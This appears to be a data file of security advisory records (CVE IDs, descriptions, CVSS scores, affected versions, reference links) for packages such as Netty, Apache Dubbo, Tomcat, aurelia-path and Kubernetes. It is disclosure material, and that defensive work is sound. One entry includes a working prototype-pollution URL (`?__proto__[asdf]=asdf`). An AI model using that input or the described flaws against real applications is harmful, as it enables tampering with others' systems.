[{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-codec'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.68.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}]
[{'type': 'WEB', 'url': 'https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37136'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/commit/41d3d61a61608f2223bb364955ab2045dd5e4020'}, {'type': 'PACKAGE', 'url': 'https://github.com/netty/netty'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0012/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5316'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-09T14:36:56Z', 'nvd_published_at': '2021-10-19T15:15:00Z'}
1.4.0
GHSA-f3pp-32qc-36w4
2021-09-22T14:30:35Z
2021-09-22T20:36:34Z
null
['CVE-2021-23444']
Prototype Pollution in jointjs
This affects the package jointjs before 3.4.2. A type confusion vulnerability can lead to a bypass of CVE-2020-28480 when the user-provided keys used in the path parameter are arrays in the setByPath function.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'npm', 'name': 'jointjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/clientIO/joint/pull/1514'}, {'type': 'WEB', 'url': 'https://github.com/clientIO/joint/commit/e5bf89efef6d5ea572d66870ffd86560de7830a8'}, {'type': 'PACKAGE', 'url': 'https://github.com/clientIO/joint'}, {'type': 'WEB', 'url': 'https://github.com/clientIO/joint/releases/tag/v3.4.2'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1655817'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1655816'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JOINTJS-1579578'}]
{'cwe_ids': ['CWE-1321', 'CWE-843'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-22T14:30:35Z', 'nvd_published_at': '2021-09-21T17:15:00Z'}
1.4.0
GHSA-cpx9-4rwv-486v
2021-09-15T18:29:58Z
2021-09-08T20:14:14Z
null
['CVE-2021-36163']
Hessian protocol configuration vulnerability in Apache Dubbo
In Apache Dubbo, users may choose to use the Hessian protocol. The Hessian protocol is implemented on top of HTTP and passes the body of a POST request directly to a HessianSkeleton: New HessianSkeleton are created without any configuration of the serialization factory and therefore without applying the dubbo properties for applying allowed or blocked type lists. In addition, the generic service is always exposed and therefore attackers do not need to figure out a valid service/method name pair. This is fixed in 2.7.13, 2.6.10.1
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.dubbo:dubbo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.dubbo:dubbo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.10.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.6.10'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36163'}, {'type': 'WEB', 'url': 'https://github.com/apache/dubbo/pull/8238'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/dubbo'}, {'type': 'WEB', 'url': 'https://github.com/apache/dubbo/releases/tag/dubbo-2.6.10.1'}, {'type': 'WEB', 'url': 'https://github.com/apache/dubbo/releases/tag/dubbo-2.7.13'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8d0adc057bb15a37199502cc366f4b1164c9c536ce28e4defdb428c0%40%3Cdev.dubbo.apache.org%3E'}]
{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-08T18:21:01Z', 'nvd_published_at': '2021-09-07T10:15:00Z'}
1.4.0
GHSA-9rjp-r58j-fxgq
2021-09-02T18:03:47Z
2021-09-02T22:05:26Z
null
['CVE-2021-23428']
Path traversal in elFinder.NetCore
This affects all versions of package elFinder.NetCore. The Path.Combine(...) method is used to create an absolute file path. Due to missing sanitation of the user input and a missing check of the generated path its possible to escape the Files directory via path traversal
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L'}]
[{'package': {'ecosystem': 'NuGet', 'name': 'elFinder.NetCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.5'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23428'}, {'type': 'PACKAGE', 'url': 'https://github.com/gordon-matt/elFinder.NetCore'}, {'type': 'WEB', 'url': 'https://github.com/gordon-matt/elFinder.NetCore/blob/633da9a4d7d5c9baefd1730ee51bf7af54889600/elFinder.NetCore/Drivers/FileSystem/FileSystemDriver.cs#L387'}, {'type': 'WEB', 'url': 'https://github.com/gordon-matt/elFinder.NetCore/blob/633da9a4d7d5c9baefd1730ee51bf7af54889600/elFinder.NetCore/Drivers/FileSystem/FileSystemDriver.cs%23L387'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-DOTNET-ELFINDERNETCORE-1313838'}]
{'cwe_ids': ['CWE-20', 'CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-02T18:03:47Z', 'nvd_published_at': '2021-09-01T15:15:00Z'}
1.4.0
GHSA-4448-rc82-fcr7
2022-12-03T04:01:44Z
2021-09-22T18:40:57Z
null
['CVE-2019-5444']
Path Traversal in serve-here.js
Versions of serve-here.js prior to 1.2.0 are vulnerable to path traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the served folder using relative paths.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'serve-here.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-5444'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/569966'}, {'type': 'PACKAGE', 'url': 'https://github.com/ChristoPy/serve-here.js'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1019'}]
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-22T18:40:39Z', 'nvd_published_at': '2019-07-10T20:15:00Z'}
1.4.0
GHSA-fjqg-w8g6-hhq8
2022-08-10T23:54:51Z
2021-09-02T17:16:28Z
null
['CVE-2021-25956']
Dolibarr vulnerable to Improper Authentication and Improper Access Control
In `Dolibarr` application, v3.3.beta1_20121221 to v13.0.2 have `Modify` access for admin level users to change other user’s details but fails to validate already existing “Login” name, while renaming the user `Login`. This leads to complete account takeover of the victim user. This happens since the password gets overwritten for the victim user having a similar login name.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'dolibarr/dolibarr'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.beta1'}, {'fixed': '14.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '< 13.0.2'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25956'}, {'type': 'WEB', 'url': 'https://github.com/Dolibarr/dolibarr/commit/c4cba43bade736ab89e31013a6ccee59a6e077ee'}, {'type': 'PACKAGE', 'url': 'https://github.com/Dolibarr/dolibarr'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25956'}]
{'cwe_ids': ['CWE-284', 'CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T15:30:25Z', 'nvd_published_at': '2021-08-17T15:15:00Z'}
1.4.0
GHSA-4gf2-xv97-63m2
2021-09-16T18:21:59Z
2021-09-20T20:43:24Z
null
['CVE-2020-1744']
Exposure of Sensitive Information in keycloak
A flaw was found in keycloak before version 9.0.1. When configuring an Conditional OTP Authentication Flow as a post login flow of an IDP, the failure login events for OTP are not being sent to the brute force protection event queue. So BruteForceProtector does not handle this events.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.0.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1744'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2020-1744'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1744'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}]
{'cwe_ids': ['CWE-200', 'CWE-755'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-16T18:21:59Z', 'nvd_published_at': '2020-03-24T14:15:00Z'}
1.4.0
GHSA-mwgj-7x7j-6966
2021-09-13T19:29:03Z
2021-09-13T20:06:14Z
null
['CVE-2021-24040']
Deserialization of Untrusted Data in ParlAI
Due to use of unsafe YAML deserialization logic, an attacker with the ability to modify local YAML configuration files could provide malicious input, resulting in remote code execution or similar risks. This issue affects ParlAI prior to v1.1.0.
[]
[{'package': {'ecosystem': 'PyPI', 'name': 'parlai'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-24040'}, {'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/pull/3402'}, {'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/pull/3429'}, {'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/commit/4374fa2aba383db6526ab36e939eb1cf8ef99879'}, {'type': 'PACKAGE', 'url': 'https://github.com/facebookresearch/ParlAI'}, {'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/releases/tag/v1.1.0'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/164136/Facebook-ParlAI-1.0.0-Code-Execution-Deserialization.html'}]
{'cwe_ids': ['CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-13T19:29:03Z', 'nvd_published_at': '2021-09-10T22:15:00Z'}
1.4.0
GHSA-579x-cjvr-cqj9
2021-09-17T18:38:47Z
2021-09-20T19:53:55Z
null
['CVE-2021-39189']
Observable Response Discrepancy in Lost Password Service
### Impact It is possible to enumerate usernames via the forgot password functionality ### Patches Update to version `10.1.3` or apply this patch manually: https://github.com/pimcore/pimcore/pull/10223.patch ### Workarounds Apply https://github.com/pimcore/pimcore/pull/10223.patch manually.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.1.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-579x-cjvr-cqj9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39189'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/10223.patch'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/10223/commits/d0a4de39cf05dce6af71f8ca039132bdfcbb0dce'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/12462a99-ebf8-4e39-80b3-54a16caa3f4c/'}]
{'cwe_ids': ['CWE-203', 'CWE-204'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-17T18:38:47Z', 'nvd_published_at': '2021-09-15T14:15:00Z'}
1.4.0
GHSA-m87f-9fvv-2mgg
2021-09-13T19:10:21Z
2021-09-13T20:05:39Z
null
['CVE-2021-39207']
Deserialization of Untrusted Data in parlai
### Impact Due to use of unsafe YAML deserialization logic, an attacker with the ability to modify local YAML configuration files could provide malicious input, resulting in remote code execution or similar risks. ### Patches The issue can be patched by upgrading to v1.1.0 or later. It can also be patched by replacing YAML deserialization with equivalent safe_load calls. ### References - https://github.com/facebookresearch/ParlAI/commit/507d066ef432ea27d3e201da08009872a2f37725 - https://github.com/facebookresearch/ParlAI/commit/4374fa2aba383db6526ab36e939eb1cf8ef99879 - https://anon-artist.github.io/blogs/blog3.html
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'parlai'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39207'}, {'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/commit/4374fa2aba383db6526ab36e939eb1cf8ef99879'}, {'type': 'WEB', 'url': 'https://github.com/facebookresearch/ParlAI/commit/507d066ef432ea27d3e201da08009872a2f37725'}, {'type': 'PACKAGE', 'url': 'https://github.com/facebookresearch/ParlAI'}]
{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-13T19:10:21Z', 'nvd_published_at': '2021-09-10T23:15:00Z'}
1.4.0
GHSA-59g9-7gfx-c72p
2021-10-18T14:52:03Z
2021-09-20T20:45:44Z
null
['CVE-2021-41079']
Infinite loop in Tomcat due to parsing error
Apache Tomcat 8.5.0 to 8.5.63, 9.0.0-M1 to 9.0.43 and 10.0.0-M1 to 10.0.2 did not properly validate incoming TLS packets. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.0.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.0.44'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.0'}, {'fixed': '8.5.64'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41079'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/34115fb3c83f6cd97772232316a492a4cc5729e0'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tomcat'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6b6b674e3f168dd010e67dbe6848b866e2acf26371452fdae313b98a@%3Cusers.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb4de81ac647043541a32881099aa6eb5a23f1b7fd116f713f8ab9dbe@%3Cdev.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rccdef0349fdf4fb73a4e4403095446d7fe6264e0a58e2df5c6799434%40%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00012.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211008-0005/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4986'}]
{'cwe_ids': ['CWE-20', 'CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-17T18:01:45Z', 'nvd_published_at': '2021-09-16T15:15:00Z'}
1.4.0
GHSA-3c9c-2p65-qvwv
2022-05-26T19:50:24Z
2021-09-27T20:12:16Z
null
['CVE-2021-41097']
Prototype pollution in aurelia-path
### Impact The vulnerability exposes Aurelia application that uses `aurelia-path` package to parse a string. The majority of this will be Aurelia applications that employ the `aurelia-router` package. An example is this could allow an attacker to change the prototype of base object class `Object` by tricking an application to parse the following URL: `https://aurelia.io/blog/?__proto__[asdf]=asdf` ### Patches The problem should be patched in version `1.1.7`. Any version earlier than this is vulnerable. ### Workarounds A partial work around is to free the Object prototype: ```ts Object.freeze(Object.prototype) ```
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'aurelia-path'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.7'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/aurelia/path/security/advisories/GHSA-3c9c-2p65-qvwv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41097'}, {'type': 'WEB', 'url': 'https://github.com/aurelia/path/issues/44'}, {'type': 'WEB', 'url': 'https://github.com/aurelia/path/commit/7c4e235433a4a2df9acc313fbe891758084fdec1'}, {'type': 'PACKAGE', 'url': 'https://github.com/aurelia/path'}, {'type': 'WEB', 'url': 'https://github.com/aurelia/path/releases/tag/1.1.7'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/aurelia-path'}]
{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-27T19:18:37Z', 'nvd_published_at': '2021-09-27T18:15:00Z'}
1.4.0
GHSA-624f-cqvr-3qw4
2021-09-09T13:33:26Z
2021-09-08T21:11:14Z
null
['CVE-2021-32805']
URL Redirection to Untrusted Site ('Open Redirect') in Flask-AppBuilder
### Impact If using Flask-AppBuilder OAuth, an attacker can share a carefully crafted URL with a trusted domain for an application built with Flask-AppBuilder, this URL can redirect a user to a malicious site. This is an open redirect vulnerability ### Patches Install Flask-AppBuilder 3.2.2 or above ### Workarounds Filter HTTP traffic containing `?next={next-site}` where the `next-site` domain is different from the application you are protecting
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Flask-AppBuilder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-624f-cqvr-3qw4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32805'}, {'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/commit/6af28521589599b1dbafd6313256229ee9a4fa74'}, {'type': 'PACKAGE', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder'}, {'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/releases/tag/v3.3.2'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Flask-AppBuilder/'}]
{'cwe_ids': ['CWE-601'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-09-08T21:10:56Z', 'nvd_published_at': '2021-09-08T18:15:00Z'}
1.4.0
GHSA-rpq8-mmwh-q9hm
2022-02-08T21:23:38Z
2021-09-01T18:23:58Z
null
['CVE-2020-6950']
Directory traversal in Eclipse Mojarra
Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.glassfish:mojarra-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.14'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-6950'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-ee4j/mojarra/issues/4571'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-ee4j/mojarra/commit/cefbb9447e7be560e59da2da6bd7cb93776f7741'}, {'type': 'WEB', 'url': 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=550943'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse-ee4j/mojarra'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T21:21:35Z', 'nvd_published_at': '2021-06-02T16:15:00Z'}
1.4.0
GHSA-m7h5-fjjq-559f
2021-10-07T13:56:41Z
2021-09-30T17:11:11Z
null
['CVE-2020-20120']
SQL Injection in topthink/thinkphp
ThinkPHP v3.2.3 and below contains a SQL injection vulnerability which is triggered when the array is not passed to the "where" and "query" methods.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'topthink/thinkphp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-20120'}, {'type': 'WEB', 'url': 'https://github.com/top-think/thinkphp/issues/553'}, {'type': 'PACKAGE', 'url': 'https://github.com/top-think/thinkphp'}]
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-09-30T16:59:44Z', 'nvd_published_at': '2021-09-28T23:15:00Z'}
1.4.0
GHSA-mfv7-gq43-w965
2021-09-14T18:47:27Z
2021-09-07T23:09:24Z
null
['CVE-2021-25737']
Incomplete List of Disallowed Inputs in Kubernetes
A security issue was discovered in Kubernetes where a user may be able to redirect pod traffic to private networks on a Node. Kubernetes already prevents creation of Endpoint IPs in the localhost or link-local range, but the same validation was not performed on EndpointSlice IPs.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.16.0'}, {'fixed': '1.18.19'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.19.0'}, {'fixed': '1.19.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.20.0'}, {'fixed': '1.20.7'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.21.0'}, {'fixed': '1.21.1'}]}], 'versions': ['1.21.0']}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25737'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/102106'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes/kubernetes'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-announce/c/xAiN3924thY'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211004-0004/'}]
{'cwe_ids': ['CWE-184', 'CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-09-07T18:59:14Z', 'nvd_published_at': '2021-09-06T12:15:00Z'}
1.4.0
GHSA-vrmr-f2qh-3hhf
2021-08-30T17:30:36Z
2021-09-02T17:17:16Z
null
['CVE-2021-38599']
Improper use of cryptographic key in wal-g
WAL-G before 1.1, when a non-libsodium build (e.g., one of the official binary releases published as GitHub Releases) is used, silently ignores the libsodium encryption key and uploads cleartext backups. This is arguably a Principle of Least Surprise violation because "the user likely wanted to encrypt all file activity."
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/wal-g/wal-g'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38599'}, {'type': 'WEB', 'url': 'https://github.com/wal-g/wal-g/pull/1062'}, {'type': 'WEB', 'url': 'https://github.com/wal-g/wal-g/commit/cadf598e1c2a345915a21a44518c5a4d5401e2e3'}, {'type': 'PACKAGE', 'url': 'https://github.com/wal-g/wal-g'}, {'type': 'WEB', 'url': 'https://github.com/wal-g/wal-g/releases/tag/v1.1'}]
{'cwe_ids': ['CWE-922'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T17:30:36Z', 'nvd_published_at': '2021-08-12T16:15:00Z'}
1.4.0
GHSA-5rwj-j5m3-3chj
2021-10-21T14:28:07Z
2021-09-01T18:25:16Z
null
['CVE-2021-39176']
Missing Release of Memory after Effective Lifetime in detect-character-encoding
